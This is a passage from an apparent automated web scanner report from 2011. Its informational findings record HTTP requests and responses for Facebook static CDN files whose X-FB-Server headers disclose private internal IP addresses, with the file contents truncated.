Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y8/r/JSqaF4G1Vob.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/y8/r/JSqaF4G1Vob.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 03:02:18 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 7217
Vary: Accept-Encoding
Cache-Control: public, max-age=31216655
Expires: Tue, 17 Jul 2012 04:01:52 GMT
Date: Thu, 21 Jul 2011 20:44:17 GMT
Connection: close

/*1310961708,169776065*/

.fbDarkWidget .fan_box,
.fbDarkWidget .uiStream .uiStreamMessage{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background
...[SNIP]...

23.75. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yB/r/AI7cvamOOjQ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/yB/r/AI7cvamOOjQ.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 03:02:18 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 7211
Vary: Accept-Encoding
Cache-Control: public, max-age=31233671
Expires: Tue, 17 Jul 2012 04:14:00 GMT
Date: Thu, 21 Jul 2011 16:12:49 GMT
Connection: close

/*1310962360,169776065*/

.fbDarkWidget .fan_box,
.fbDarkWidget .uiStream .uiStreamMessage{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background
...[SNIP]...

23.76. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yB/r/AI7cvamOOjQ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 03:02:18 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 7211
Vary: Accept-Encoding
Cache-Control: public, max-age=31235237
Expires: Tue, 17 Jul 2012 06:07:15 GMT
Date: Thu, 21 Jul 2011 17:39:58 GMT
Connection: close

/*1310969202,169775815*/

.fbDarkWidget .fan_box,
.fbDarkWidget .uiStream .uiStreamMessage{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background
...[SNIP]...

23.77. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yH/r/mfm5LaL5Ify.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/yH/r/mfm5LaL5Ify.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 20 Jul 2011 21:25:07 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 18149
Vary: Accept-Encoding
Cache-Control: public, max-age=31469028
Expires: Thu, 19 Jul 2012 21:36:37 GMT
Date: Thu, 21 Jul 2011 16:12:49 GMT
Connection: close

/*1311197835,169776321*/

form{margin:0;padding:0}
label{cursor:pointer;color:#666;font-weight:bold;vertical-align:middle}
label input{font-weight:normal}
textarea,.inputtext,.inputpassword{border:1px
...[SNIP]...

23.78. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yO/r/znpKCeUuNfm.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/yO/r/znpKCeUuNfm.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df161ee90c6d315c%26origin%3Dhttp%253A%252F%252Fwww.betabeat.com%252Ffd4fffe9c02b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.betabeat.com%2F2011%2F07%2F19%2Ffever-pitch-new-yorkers-go-starry-eyed-for-start-ups%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 03:10:40 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 17115
Vary: Accept-Encoding
Cache-Control: public, max-age=31349726
Expires: Wed, 18 Jul 2012 12:29:36 GMT
Date: Thu, 21 Jul 2011 16:14:10 GMT
Connection: close

/*1311078571,169775815*/

.pas{padding:5px}
.pam{padding:10px}
.pal{padding:20px}
.pts{padding-top:5px}
.ptm{padding-top:10px}
.ptl{padding-top:20px}
.prs{padding-right:5px}
.prm{padding-right:10px}
.
...[SNIP]...

23.79. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yO/r/znpKCeUuNfm.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.186

Request

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 03:10:40 GMT
X-FB-Server: 10.138.64.186
Content-Length: 17115
Vary: Accept-Encoding
Cache-Control: public, max-age=31255053
Expires: Wed, 18 Jul 2012 15:09:08 GMT
Date: Fri, 22 Jul 2011 21:11:35 GMT
Connection: close

/*1311088148,176832698*/

.pas{padding:5px}
.pam{padding:10px}
.pal{padding:20px}
.pts{padding-top:5px}
.ptm{padding-top:10px}
.ptl{padding-top:20px}
.prs{padding-right:5px}
.prm{padding-right:10px}
.
...[SNIP]...

23.80. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yP/r/cNiPtQXsNfj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/yP/r/cNiPtQXsNfj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 02:59:55 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 31943
Vary: Accept-Encoding
Cache-Control: public, max-age=31216308
Expires: Tue, 17 Jul 2012 03:56:05 GMT
Date: Thu, 21 Jul 2011 20:44:17 GMT
Connection: close

/*1310961442,169775815*/

.async_throbber .async_saving{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/zb/r/GsNJNwuI-UM.gif) no-repeat right;padding-right:20px}
.async_throbber_left .async_savi
...[SNIP]...

23.81. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/AQsou8r87UO.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yR/r/AQsou8r87UO.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.198

Request

GET /rsrc.php/v1/yR/r/AQsou8r87UO.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 01:50:51 GMT
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 7481
Vary: Accept-Encoding
Cache-Control: public, max-age=28174147
Expires: Wed, 13 Jun 2012 15:28:32 GMT
Date: Sat, 23 Jul 2011 13:19:25 GMT
Connection: close

/*1308065409,169775814*/

if (window.CavalryLogger) { CavalryLogger.start_js(["8PKAL"]); }

OauthLogin=function(b,a){this.provider=b;this.endpoint=a;return this;};OauthLogin.prototype.login=function(d
...[SNIP]...

23.82. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/yW/r/vgIBfPxn_gJ.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 02:59:55 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 32174
Vary: Accept-Encoding
Cache-Control: public, max-age=31238631
Expires: Tue, 17 Jul 2012 05:36:40 GMT
Date: Thu, 21 Jul 2011 16:12:49 GMT
Connection: close

/*1310967404,169776319*/

.async_throbber .async_saving{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/zb/r/GsNJNwuI-UM.gif) no-repeat right;padding-right:20px}
.async_throbber_left .async_savi
...[SNIP]...

23.83. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/ay94DQdlwaE.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yc/r/ay94DQdlwaE.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.198

Request

GET /rsrc.php/v1/yc/r/ay94DQdlwaE.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Jul 2011 05:38:38 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Content-Length: 24075
Vary: Accept-Encoding
Cache-Control: public, max-age=31338034
Expires: Fri, 20 Jul 2012 06:20:00 GMT
Date: Sat, 23 Jul 2011 13:19:26 GMT
Connection: close

/*1311229073,169775558*/

if (window.CavalryLogger) { CavalryLogger.start_js(["RfVN+"]); }

if(!window.CommentAdminPanelController){window.CommentAdminPanelController=function(a){copy_properties(this,
...[SNIP]...

23.84. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yc/r/lIE6LBGZUrP.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.198

Request

GET /rsrc.php/v1/yc/r/lIE6LBGZUrP.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 23:07:22 GMT
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 12878
Vary: Accept-Encoding
Cache-Control: public, max-age=31319263
Expires: Wed, 18 Jul 2012 04:00:32 GMT
Date: Thu, 21 Jul 2011 16:12:49 GMT
Connection: close

/*1311047949,169775814*/

.sp_1cxbbk{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zx/r/mWGXq9y45OX.png);background-repeat:no-repeat;display:inline-block;height:14px;width:11px}
.sx_9f06
...[SNIP]...

23.85. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yf/r/e0OzuKrROTf.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/yf/r/e0OzuKrROTf.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 20 Jul 2011 21:25:13 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 18090
Vary: Accept-Encoding
Cache-Control: public, max-age=31452778
Expires: Thu, 19 Jul 2012 21:37:15 GMT
Date: Thu, 21 Jul 2011 20:44:17 GMT
Connection: close

/*1311197829,169776065*/

form{margin:0;padding:0}
label{cursor:pointer;color:#666;font-weight:bold;vertical-align:middle}
label input{font-weight:normal}
textarea,.inputtext,.inputpassword{border:1px
...[SNIP]...

23.86. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/myfphzY3EFO.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yi/r/myfphzY3EFO.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.184

Request

GET /rsrc.php/v1/yi/r/myfphzY3EFO.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 26 Apr 2011 03:46:08 GMT
X-FB-Server: 10.138.64.184
Content-Length: 5557
Vary: Accept-Encoding
Cache-Control: public, max-age=27085096
Expires: Fri, 01 Jun 2012 00:57:42 GMT
Date: Sat, 23 Jul 2011 13:19:26 GMT
Connection: close

/*1306976241,176832696*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dnQsV"]); }

function OpenIDRequest(){var a=new AsyncRequest().setReadOnly(true).setHandler(this.asyncResponseHandler.bin
...[SNIP]...

23.87. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.198

Request

GET /rsrc.php/v1/yp/r/XJ-mTyMG8hy.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 15 Jul 2011 19:41:25 GMT
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 15800
Vary: Accept-Encoding
Cache-Control: public, max-age=31234967
Expires: Tue, 17 Jul 2012 04:35:41 GMT
Date: Thu, 21 Jul 2011 16:12:54 GMT
Connection: close

/*1310963682,169775814*/

if (window.CavalryLogger) { CavalryLogger.start_js(["KQ3gR"]); }

function ConnectSocialWidget(a,b){ConnectSocialWidget.setInstance(b,this);ConnectSocialWidget.delayUntilDisp
...[SNIP]...

23.88. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.182

Request

GET /rsrc.php/v1/yx/r/-zTzCY4nRsr.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 02:47:10 GMT
X-FB-Server: 10.138.17.182
Content-Length: 95273
Vary: Accept-Encoding
Cache-Control: public, max-age=31227362
Expires: Tue, 17 Jul 2012 03:56:03 GMT
Date: Thu, 21 Jul 2011 17:40:01 GMT
Connection: close

/*1310961344,176820662*/

if (window.CavalryLogger) { CavalryLogger.start_js(["SH1q\/"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string
...[SNIP]...

23.89. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sun, 17 Jul 2011 20:39:18 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 95273
Vary: Accept-Encoding
Cache-Control: public, max-age=31232174
Expires: Tue, 17 Jul 2012 03:49:08 GMT
Date: Thu, 21 Jul 2011 16:12:54 GMT
Connection: close

/*1310961015,169776067*/

if (window.CavalryLogger) { CavalryLogger.start_js(["SH1q\/"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string
...[SNIP]...

23.90. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yy/r/jsZvfR86-A1.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 22:54:20 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 178954
Vary: Accept-Encoding
Cache-Control: public, max-age=31234665
Expires: Wed, 18 Jul 2012 09:29:14 GMT
Date: Fri, 22 Jul 2011 21:11:29 GMT
Connection: close

/*1311067737,169776066*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

23.91. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yy/r/jsZvfR86-A1.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /rsrc.php/v1/yy/r/jsZvfR86-A1.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df161ee90c6d315c%26origin%3Dhttp%253A%252F%252Fwww.betabeat.com%252Ffd4fffe9c02b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.betabeat.com%2F2011%2F07%2F19%2Ffever-pitch-new-yorkers-go-starry-eyed-for-start-ups%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 18 Jul 2011 22:54:20 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 178954
Vary: Accept-Encoding
Cache-Control: public, max-age=31349731
Expires: Wed, 18 Jul 2012 12:29:39 GMT
Date: Thu, 21 Jul 2011 16:14:08 GMT
Connection: close

/*1311078570,169775556*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

23.92. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z7/r/ql9vukDCc4R.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.181

Request

GET /rsrc.php/v1/z7/r/ql9vukDCc4R.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css

Response

HTTP/1.1 200 OK
Content-Length: 1177
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 06:11:23 GMT
X-FB-Server: 10.138.16.181
Cache-Control: public, max-age=25228632
Expires: Tue, 08 May 2012 16:10:08 GMT
Date: Thu, 21 Jul 2011 16:12:56 GMT
Connection: close

.PNG
.
...IHDR...............2...#PLTE.........444...l........6X.......fff...s.....ddd...DDDUUUQl..E.......`x.......;Y..........MMMcx.u.................bw.............uuu...............h.......Xj.
...[SNIP]...

23.93. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zL/r/FGFbc80dUKj.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.186

Request

GET /rsrc.php/v1/zL/r/FGFbc80dUKj.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection

Response

HTTP/1.1 200 OK
Content-Length: 1916
Content-Type: image/png
Last-Modified: Wed, 17 Mar 2010 14:12:40 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.17.186
Cache-Control: public, max-age=20536816
Expires: Fri, 16 Mar 2012 21:12:14 GMT
Date: Sat, 23 Jul 2011 04:31:58 GMT
Connection: close

.PNG
.
